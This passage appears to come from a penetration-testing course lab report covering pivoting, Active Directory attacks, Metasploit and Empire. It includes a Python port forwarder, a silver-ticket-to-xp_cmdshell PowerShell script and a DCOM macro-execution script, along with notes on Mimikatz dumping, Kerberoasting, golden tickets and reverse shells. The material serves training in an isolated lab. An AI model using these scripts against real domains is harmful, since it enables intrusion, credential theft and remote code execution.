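    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass
            s.close()


def start_forwarder(listen_host, listen_port, target_host, target_port):
    """rinetd-style rule 'listen_host listen_port target_host target_port': each accepted
    connection is connected through to the target and relayed in both directions.
    Returns the port actually bound (useful when listen_port is 0)."""
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind((listen_host, listen_port))
    ls.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = ls.accept()
            except OSError:
                return
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=5)
                upstream.settimeout(None)       # connect timeout only; relay stays idle-safe
            except OSError:
                client.close()                  # target unreachable: drop this client only
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return ls.getsockname()[1]


def start_echo_server(host="127.0.0.1"):
    """Constructed stand-in for the service on the far side of the pivot."""
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.bind((host, 0))
    ls.listen(16)

    def serve(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    return
                conn.sendall(data)

    def accept_loop():
        while True:
            try:
                conn, _ = ls.accept()
            except OSError:
                return
            threading.Thread(target=serve, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return ls.getsockname()[1]


def roundtrip(host, port, payload):
    """Send payload and read back exactly as many bytes as were sent."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)
        got = b""
        while len(got) < len(payload):
            chunk = s.recv(len(payload) - len(got))
            if not chunk:
                break
            got += chunk
    return got


if __name__ == "__main__":
    target_port = start_echo_server()
    relay_port = start_forwarder("127.0.0.1", 0, "127.0.0.1", target_port)
    print(roundtrip("127.0.0.1", relay_port, b"hello through the forwarder"))
```

The same relay, bound on the pivot's external interface and pointed at an internal host, is exactly what the rinetd rule in the scenario expresses in one line; the only difference in practice is that rinetd also handles logging and access control.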

20.2.1.1 Exercises
1. Connect to your dedicated Linux lab client and run the clear_rules.sh script from
/root/port_forwarding_and_tunneling/ as root.

2. Run the ssh_local_port_forwarding.sh script from
/root/port_forwarding_and_tunneling/ as root.

3. Take note of the Linux client and Windows Server 2016 IP addresses shown in the
Student Control Panel.

4. Attempt to replicate the smbclient enumeration covered in the above scenario.

Tunnelling.

Edited smb.conf

Enumerating shares. Tunnelling successful!

20.2.2.1 Exercises
1. Connect to your dedicated Linux lab client via SSH and run the clear_rules.sh
script from /root/port_forwarding_and_tunneling/ as root.

2. Close any SSH connections to your dedicated Linux lab client and then connect
as the student account using rdesktop and run the ssh_remote_port_forward.sh script
from /root/port_forwarding_and_tunneling/ as root.

Logging in.

3. Attempt to replicate the SSH remote port forwarding covered in the above
scenario and ensure that you can scan and interact with the MySQL service.

Tunnelling successful

Scanning the service.

Interacting with the service.

20.2.3.1 Exercises
1. Connect to your dedicated Linux lab client and run the clear_rules.sh script from
/root/port_forwarding_and_tunneling/ as root.

2. Take note of the Linux client and Windows Server 2016 IP addresses.

3. Create a SOCKS4 proxy on your Kali machine, tunneling through the Linux target.

4. Perform a successful nmap scan against the Windows Server 2016 machine through
the proxy.

5. Perform an nmap SYN scan through the tunnel. Does it work? Are the results
accurate?

The scan runs, but the results are not accurate. Proxychains only redirects connect() calls
made through the socket library; a SYN scan uses raw packets that never enter the proxy, so
the probes leave Kali directly instead of going through the tunnel. Only a full connect scan
(-sT) gives reliable results through a SOCKS proxy.

20.3.1.1 Exercises
1. Obtain a reverse shell on your Windows lab client through the Sync Breeze
vulnerability.

Exploited SyncBreeze and got a reverse shell.

2. Use plink.exe to establish a remote port forward to the MySQL service on your
Windows 10 client.

3. Scan the MySQL port via the remote port forward.

20.4.1.1 Exercise
1. Obtain a reverse shell on your Windows lab client through the Sync Breeze
vulnerability.

2. Using the SYSTEM shell, attempt to replicate the port forwarding example using
netsh.

Adding the firewall rule.

Allowing inbound traffic on port 4445.

Mounted the share.

20.5.1.1 Exercises
1. Connect to your dedicated Linux lab client as the student account using rdesktop and
run the http_tunneling.sh script from /root/port_forwarding_and_tunneling/ as root.

2. Start the apache2 service and exploit the vulnerable web application hosted on port
443 (covered in a previous module) in order to get a reverse HTTP shell.

3. Replicate the scenario demonstrated above using your dedicated clients.

Local port forward

hts (HTTPTunnel server) port forward started.

htc (HTTPTunnel client) tunnel established.

RDP successful

21.2.1.1 Exercise
1. Connect to your Windows 10 client and use net.exe to lookup users and groups in the
domain. See if you can discover any interesting users or groups.

Found one admin account, jeff_admin, two service accounts and one user account named adam.

jeff_admin belongs to the Domain Admins group.

adam is a member of “Another_Nested_Group”.

Enumerating the domain groups shows three interesting groups:
“Secret_Group, Another_Nested_Group, Nested_Group”.

21.2.2.1 Exercises
1. Modify the PowerShell script to only return members of the Domain Admins group.

2. Modify the PowerShell script to return all computers in the domain.

3. Add a filter to only return computers running Windows 10.

21.2.3.1 Exercises
1. Repeat the enumeration to uncover the relationship between Secret_Group,
Nested_Group, and Another_Nested_Group.

Secret_Group is a member of Nested_Group.

Nested_Group is a member of Another_Nested_Group.

Another_Nested_Group has the member adam.

2. The script presented in this section required us to change the group name at
each iteration. Adapt the script in order to unravel nested groups programmatically
without knowing their names beforehand.
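Exercise 2 asks for the recursion that the module's script lacks: instead of editing the group name by hand, every group returned by a query is queried in turn until only users remain. The following is an added example, not the module's PowerShell script: it implements that walk in Python over a constructed dictionary that stands in for the LDAP member attribute of each group. The group and user names are invented, not the lab's, and the data deliberately contains a membership cycle, which Active Directory allows and which a naive recursion would loop on forever.

```python
# Added example (not the module's PowerShell script): the recursion needed to unravel nested
# groups without knowing their names beforehand. DIRECTORY is a constructed dict standing in
# for the LDAP 'member' attribute of each group; names and DNs are invented, not the lab's,
# and the data includes a cycle that a naive recursion would loop on.
DIRECTORY = {
    "CN=Outer_Group,OU=Groups,DC=corp,DC=lab": [
        "CN=Middle_Group,OU=Groups,DC=corp,DC=lab",
        "CN=bob,OU=Users,DC=corp,DC=lab",
    ],
    "CN=Middle_Group,OU=Groups,DC=corp,DC=lab": [
        "CN=Inner_Group,OU=Groups,DC=corp,DC=lab",
        "CN=Outer_Group,OU=Groups,DC=corp,DC=lab",      # cycle back to the outer group
    ],
    "CN=Inner_Group,OU=Groups,DC=corp,DC=lab": [
        "CN=alice,OU=Users,DC=corp,DC=lab",
    ],
}


def lookup_members(group_dn):
    """Stand-in for the LDAP query the script runs: the 'member' attribute of one group."""
    return DIRECTORY.get(group_dn, [])


def is_group(dn):
    """Stand-in for checking samAccountType/objectCategory on the returned object."""
    return dn in DIRECTORY


def effective_members(group_dn, _seen=None):
    """Every user reachable from group_dn through any depth of nesting."""
    seen = _seen if _seen is not None else set()
    if group_dn in seen:
        return set()                                    # already expanded: break the cycle
    seen.add(group_dn)
    users = set()
    for member in lookup_members(group_dn):
        if is_group(member):
            users |= effective_members(member, seen)
        else:
            users.add(member)
    return users


def nesting_chains(group_dn, _path=None):
    """Each path from group_dn down to a user, so the report can show the full chain."""
    path = (_path or []) + [group_dn]
    chains = []
    for member in lookup_members(group_dn):
        if is_group(member):
            if member not in path:                      # skip cycles
                chains.extend(nesting_chains(member, path))
        else:
            chains.append(path + [member])
    return chains


def effective_groups(user_dn):
    """Reverse view: every group a user is in, directly or through nesting."""
    return {g for g in DIRECTORY if user_dn in effective_members(g)}


def short(dn):
    """'CN=alice,OU=Users,...' -> 'alice'."""
    return dn.split(",", 1)[0][3:]


if __name__ == "__main__":
    outer = "CN=Outer_Group,OU=Groups,DC=corp,DC=lab"
    print(sorted(short(u) for u in effective_members(outer)))
    for chain in nesting_chains(outer):
        print(" -> ".join(short(x) for x in chain))
```

To run this against a real domain, lookup_members() and is_group() are the only two functions to replace, with the same DirectorySearcher calls the module's script already uses; the visited set is what keeps the walk finite when two groups are members of each other.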

21.2.4.1 Exercises
1. Download and use PowerView to perform the same enumeration against the
student VM while in the context of the Offsec account.

Offsec has logged in to DC01

DC01 shows Offsec logged in from the Windows client

2. Log in to the student VM with the Jeff_Admin account and perform a remote
desktop login to the domain controller using the Jeff_Admin account. Next, execute the
GetNetLoggedOn function on the student VM to discover logged-in users on the domain
controller while in the context of the Jeff_Admin account.

3. Repeat the enumeration by using the DownloadString method from the
System.Net.WebClient class in order to download PowerView from your Kali system
and execute it in memory without saving it to the hard disk.

21.2.5.1 Exercises
1. Repeat the steps from this section to discover the service principal name for the IIS
server.

2. Discover any additional registered service principal names in the domain.

3. Update the script so the result includes the IP address of any servers where a service
principal name is registered.

Script updated

4. Use the Get-SPN script and rediscover the same service principal names.

21.3.3.1 Exercises
1. Use Mimikatz to dump all password hashes from the student VM.

296 | Page
297 | Page
2. Log in to the domain controller as the Jeff_Admin account through Remote Desktop
and use Mimikatz to dump all password hashes from the server.

Rdesktop to Domain controller via pivoting through Debian client.

Dumped credentials.

298 | Page
21.3.4.1 Exercises
1. Repeat the manual effort of requesting the service ticket, exporting it, and cracking it
by using the tgsrepcrack.py Python script.

Requesting TGS ticket.

Exported ticket.

299 | Page
Cracked hash.

2. Perform the same action with any other SPNs in the domain.

Requested sql service TGS.

300 | Page
Dumping TGS.

Cracked TGS.

3. Crack the same service ticket using John the Ripper.

Dumping hash in john format

Hash cracked

4. Use the Invoke-Kerberoast.ps1 script to repeat these exercises.

Dumped hashes using Invoke-Kerberoast.ps1

Cracked the SQL service hash.

21.3.5.1 Exercises
1. Use the PowerShell script in this module to guess the password of the jeff_admin
user.

2. Use the Spray-Passwords.ps1 tool to perform a lookup brute force attack of all
users in the domain from a password list.

21.4.2.1 Exercise
1. Execute the overpass the hash attack above and gain an interactive command
prompt on the domain controller. Make sure to reboot the Windows 10 client before
starting the exercise to clear any cached Kerberos tickets.

Running notepad as different user.

Got cached credentials for jeff_admin

Launched powershell as jeff_admin.

Cached jeff_admin TGT.

Launched cmd.exe as the jeff_admin user.

21.4.3.1 Exercises
1. Create and inject a silver ticket for the iis_service account.

2. How can creating a silver ticket with group membership in the Domain Admins group
for a SQL service provide a way to gain arbitrary code execution on the associated
server?

Ans: A silver ticket is a forged TGS encrypted with the SQL service account's key, so the SQL server decrypts and accepts it without ever contacting the domain controller, and by default it does not validate the PAC with the DC either. That means we choose the group memberships in the PAC ourselves. With Domain Admins in the PAC, SQL Server treats the forged user as a member of that group; if Domain Admins (or a local group it belongs to, such as BUILTIN\Administrators) has a login mapped to the sysadmin server role, the user can enable xp_cmdshell and run arbitrary operating system commands on that server as the SQL service account. The ticket is crafted with Mimikatz (kerberos::golden with /service:MSSQLSvc and the account's NTLM hash), injected into the session with /ptt or Rubeus, and then used by any Kerberos-aware client, for example a SQL connection with integrated security.

3. Create a silver ticket for the SQL service account.
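The answer to question 2 and exercise 3 meet in the following added example (written for this write-up, not the report's or the course's own commands). It assumes the silver ticket has already been forged with mimikatz using the SQL service account's NTLM hash, /service:MSSQLSvc, a /target of the form host:port and /groups:512 for Domain Admins, and injected with /ptt into the current session; the server name is a placeholder.

```powershell
# Added example (not the report's own commands): turn an injected silver
# ticket for MSSQLSvc into OS command execution through SQL Server.
$server = 'CorpSQLServer.corp.com'   # assumption: host in the MSSQLSvc SPN

# Integrated Security=SSPI makes the client authenticate with Kerberos and
# look for MSSQLSvc/<host>:1433 in the ticket cache, so the /target given to
# mimikatz must match this exact host:port form or the client will ask the
# KDC for a real ticket instead.
$conn = New-Object System.Data.SqlClient.SqlConnection(
    "Server=$server,1433;Database=master;Integrated Security=SSPI")
$conn.Open()

function Invoke-Query([string]$Query) {
    # Run a batch and return column 0 of every row in every result set.
    $cmd = $conn.CreateCommand()
    $cmd.CommandText = $Query
    $reader = $cmd.ExecuteReader()
    do { while ($reader.Read()) { $reader.GetValue(0) } } while ($reader.NextResult())
    $reader.Close()
}

# Whom does SQL Server think we are, and did the forged PAC get us sysadmin?
Invoke-Query "SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');"

# With sysadmin, the group membership we wrote into the PAC becomes command
# execution as the SQL service account on that server.
Invoke-Query @"
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
"@
$conn.Close()
```

If the second query returns 0, no login on that instance maps our forged groups to sysadmin and the sp_configure calls will be refused; sp_helpsrvrolemember 'sysadmin' lists which logins do, and the ticket can be re-forged with /groups or /sids that match one of them. The forged ticket never appears in the DC's logs, which is the defensive lesson: rotate service account passwords and watch for logons on the server that have no matching 4768/4769 on a domain controller.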

21.4.4.1 Exercises
1. Repeat the exercise of launching Notepad using Excel and DCOM.

Created Macro.

Copied the macro xlsm file to the destination and launched the macro.

Task Manager shows excel has launched in the background along with notepad.

2. Improve the attack by replacing the VBA macro with a reverse shell connecting back
to Netcat on your windows student VM.

Created macro.

Launched the macro via DCOM.

Got Reverse shell on windows client.

3. Set up a pivoting channel from the domain controller to your Kali machine and obtain
a reverse shell

Set up a tunnel from the Windows client to my attacker machine using socat, then ran the payload on the server, which is configured with lport 8080.

Started a Netcat listener on the attacker machine on port 1337 and got a reverse shell.
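The three exercises above are one procedure driven from the Windows client: copy a macro-enabled workbook to the target, instantiate Excel there over DCOM, and run the macro. The PowerShell below is an added example written for this write-up, not the report's or the course's own commands. It assumes the DC's address is 192.168.1.110 (a placeholder), that the current token is a local administrator there (for instance the overpass-the-hash shell from 21.4.2), and that the workbook already contains a macro named mymacro (the reverse-shell VBA from exercise 2, which the report does not reproduce).

```powershell
# Added example (not the report's own commands): launch a macro on the DC
# through the Excel.Application DCOM object.
$target     = '192.168.1.110'                            # assumption: the DC
$localXlsm  = 'C:\Users\jeff_admin.corp\myexcel.xlsm'   # assumption: local copy
$remoteXlsm = "\\$target\c$\myexcel.xlsm"

# Excel started under the SYSTEM profile refuses to open a workbook unless the
# profile's Desktop folder exists, so create it (32- and 64-bit paths) first.
foreach ($p in 'sysWOW64', 'System32') {
    $null = [System.IO.Directory]::CreateDirectory("\\$target\c$\Windows\$p\config\systemprofile\Desktop")
}
[System.IO.File]::Copy($localXlsm, $remoteXlsm, $true)

# Instantiate Excel on the remote host. DCOM activation needs admin rights on
# the target and TCP 135 plus the dynamic RPC range open towards it.
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID('Excel.Application', $target))
$excel.Visible = $false
$wb = $excel.Workbooks.Open('C:\myexcel.xlsm')   # path as seen from the DC
$excel.Run('mymacro')

# The macro's child process survives Excel; close the workbook and quit so a
# lingering EXCEL.EXE under SYSTEM does not give a defender an easy find.
$wb.Close($false)
$excel.Quit()
[System.Runtime.InteropServices.Marshal]::ReleaseComObject($excel) | Out-Null
```

For exercise 3 the macro's callback address must be something the DC can reach, which is the Windows client's socat port rather than Kali, exactly as described in the notes above.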

21.5.1.1 Exercises
1. Repeat the steps shown above to dump the krbtgt password hash and create and
use a golden ticket.
Dumped the krbtgt hash on Domain Controller.

On the windows client used mimikatz and the krbtgt hash to generate a Golden Ticket.
Launched cmd.

Successfully launched a high-privileged shell as fakeuser.

2. Why is the password hash for the krbtgt account changed during a functional
level upgrade from Windows 2003 to Windows 2008?

Ans: Raising the domain functional level to Windows Server 2008 introduces Kerberos AES encryption, and the krbtgt account needs AES keys to issue tickets with it. Those keys are derived from the password, so the krbtgt password is changed as part of the DFL upgrade to generate them. In practice this also means a golden ticket forged from the old hash stops working after the upgrade.

22.1.3.1 Exercises
1. Start the postgresql service and launch msfconsole.

2. Use the SMB, HTTP, and any other interesting auxiliary modules to scan the lab
systems.

3. Review the hosts information in the database.

22.2.1.1 Exercise
1. Exploit SyncBreeze using the existing Metasploit module.

22.3.3.1 Exercise
1. Take time to review and experiment with the various payloads available in Metasploit.

Using HTTP payload.

Using windows/meterpreter/reverse_ipv6_tcp. Didn’t work.

Using exploit/windows/http/syncbreeze_bof

22.3.7.1 Exercises
1. Create a staged and a non-staged Linux binary payload to use on your Kali system.

Staged.

Non-staged.

2. Setup a Netcat listener and run the non-staged payload. Does it work?

The non-staged payload works flawlessly, since it carries the whole shell and only needs something to connect to.

3. Setup a Netcat listener and run the staged payload. Does it work?

The staged payload does not work and gives a segmentation fault. That is expected: the stager only contains enough code to connect back and read the second stage from the socket, and Netcat accepts the connection but never sends a stage, so the stager has nothing valid to execute. A staged payload needs exploit/multi/handler with the matching payload set.

4. Get a Meterpreter shell on your Windows system. Practice file transfers.

Upload.

Download.

5. Inject a payload into plink.exe. Test it on your Windows system.

Got reverse shell.

6. Create an executable file running a Meterpreter payload and execute it on your
Windows system.

File created.

Executed.

Got Reverse shell.

7. After establishing a Meterpreter connection, setup a new transport type and change
to it.

22.4.1.1 Exercise
1. Create a new Metasploit module for your SyncBreeze exploit.

Module created.

22.5.4.1 Exercise
1. Use post-exploitation modules and extensions along with pivoting techniques to
enumerate and compromise the domain controller from a meterpreter shell obtained
from your Windows 10 client.

Loaded kiwi to dump credentials on the Windows client.

Added routes to reach the Windows server through the client's Meterpreter session and scanned its ports.

Used the windows/smb/psexec module to access the Windows server.

Tried using autoroute to pivot to the Windows server.

Got shell on windows server.

22.6.1.1 Exercise
1. Create a resource script using both a second stage encoder and autorun scripts and
use it with the meterpreter payload.

23.1.3.1 Exercises
1. Install and start PowerShell Empire on your Kali system.

2. Create a PowerShell Empire listener on your Kali machine and execute a stager on
your Windows 10 client.

Creating Listener.

Executing launcher.

3. Experiment with the PowerShell Empire agent and its basic functionality.

whoami shows the current user.

Shell launches a command shell.

steal_token steals the access token of another process.

The mimikatz module loads Mimikatz on the victim and dumps password hashes.

Sherlock checks the host for missing patches tied to known local privilege escalation vulnerabilities.

23.3.1.1 Exercises
1. Set up a PowerShell Empire listener and stager and obtain a working agent.

2. Perform enumeration on the domain using various modules.

Using Sherlock to discover missing patches.

Used the situational awareness modules.

3. Perform a remote desktop login with the account Jeff_Admin to ensure the
credentials are cached on the Windows 10 client and then dump the credentials using
PowerShell Empire.

Used mimikatz module.

4. Experiment with the different lateral movement modules.

Get_user module.

Executed the privesc module.

Using the fodhelper UAC bypass module to get a high-integrity shell.

Using mimikatz to dump credentials.

24.2.2.1 Exercise
1. Use sqlmap to exploit the SQL injection and extract the username and password.

24.5.1.1 Exercises
1. Modify the original Python exploit and capture the reverse shell.

Modified the exploit.

Got a reverse shell.

2. The original UDF exploit is advertised as a privilege escalation exploit. Why are we
getting an unprivileged shell?

Because the UDF executes commands with the privileges of the mysqld process, which on ZORA runs as the unprivileged mysql user, so anything launched through it, including our shell, is unprivileged. The original exploit only becomes a privilege escalation in its last few lines, where it copies a shell and makes the copy SUID root, and that step can only succeed when MySQL itself runs as root. The manual method in the PDF skips the SUID step altogether, and even when it is included it fails on ZORA because the mysql account cannot create files or directories in that location, so /bin/bash is never made SUID and the shell stays unprivileged.

